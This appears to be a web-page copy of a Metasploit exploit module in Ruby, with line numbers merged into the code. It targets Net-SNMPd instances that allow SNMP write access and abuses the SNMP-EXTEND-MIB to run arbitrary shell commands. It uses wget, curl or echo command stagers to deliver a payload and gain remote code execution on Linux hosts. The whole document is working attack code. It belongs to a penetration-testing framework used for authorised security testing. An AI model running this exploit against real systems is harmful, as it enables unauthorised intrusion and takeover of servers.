Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/snmp/net_snmpd_rw_access.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'snmp'67class MetasploitModule < Msf::Exploit::Remote8Rank = NormalRanking910include Msf::Exploit::Remote::SNMPClient11include Msf::Exploit::CmdStager1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',18'Description' => %q(19This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to20configure MIB extensions and lead to remote code execution.21),22'License' => MSF_LICENSE,23'Author' => ['Steve Embling at InteliSecure'],24'References' =>25[26[ 'URL', 'http://net-snmp.sourceforge.net/docs/mibs/NET-SNMP-EXTEND-MIB.txt'],27[ 'URL', 'https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e'],28[ 'URL', 'https://digi.ninja/blog/snmp_to_shell.php'],29[ 'URL', 'https://sourceforge.net/p/net-snmp/mailman/message/15735617/']30],31'Payload' =>32{33'Space' => 409634#note space above is not a hard limit and can be increased if required35#'BadChars' => "\x00"36},37'Targets' =>38[39['Linux x86', {40'Arch' => ARCH_X86,41'Platform' => 'linux',42'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}],43['Linux x64', {44'Arch' => ARCH_X64,45'Platform' => 'linux',46'CmdStagerFlavor' => [ :echo, :printf, :bourne, :wget, :curl ]}]47],48#Not tested on other platforms but confirmed the above works.49'DisclosureDate' => '2004-05-10',50'DefaultTarget' => 0,51)52)53register_options(54[55OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),56OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200]),57OptString.new('SHELL', [true, 'Shell to call with -c argument', '/bin/bash'])58])59end6061# The exploit method connects and sets:62# NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)63# NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable64# NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments65def execute_command(cmd, opts = {})66oid_1 = '1.3.6.1.4.1.8072.1.3.2.2.1.21.3.116.109.112'67oid_1_value = 468oid_2 = '1.3.6.1.4.1.8072.1.3.2.2.1.2.3.116.109.112'69oid_2_value = datastore['SHELL']70oid_3 = '1.3.6.1.4.1.8072.1.3.2.2.1.3.3.116.109.112'71oid_4 = '1.3.6.1.4.1.8072.1.3.2.4.1.2.3.116.109.112.1'7273comm = datastore['COMMUNITY']7475cmd = cmd.shellescape unless flavor == :bourne7677oid_3_value = "-c \"#{cmd}\""7879vprint_status(oid_3_value)80SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|81#vprint_status(manager.get_value("sysDescr.0"))82varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))83varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))84varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))85resp = manager.set([varbind1, varbind2, varbind3])86vprint_status(manager.get_value(oid_4).to_s)87end88#Hit same again, first rewrite appears to remove the MIB, the next reinstates it.89SNMP::Manager.open(:Host => rhost, :Port => rport, :Community => comm) do |manager|90varbind1 = SNMP::VarBind.new(oid_1,SNMP::Integer.new(oid_1_value))91varbind2 = SNMP::VarBind.new(oid_2,SNMP::OctetString.new(oid_2_value))92varbind3 = SNMP::VarBind.new(oid_3,SNMP::OctetString.new(oid_3_value))93begin94resp = manager.set([varbind1, varbind2, varbind3])95vprint_status(manager.get_value(oid_4).to_s)96rescue SNMP::RequestTimeout97print_good("SNMP request timeout (this is promising).")98end99end100end101102def exploit103execute_cmdstager(linemax: datastore['CHUNKSIZE'].to_i, :temp => datastore['FILEPATH'])104end105end106107108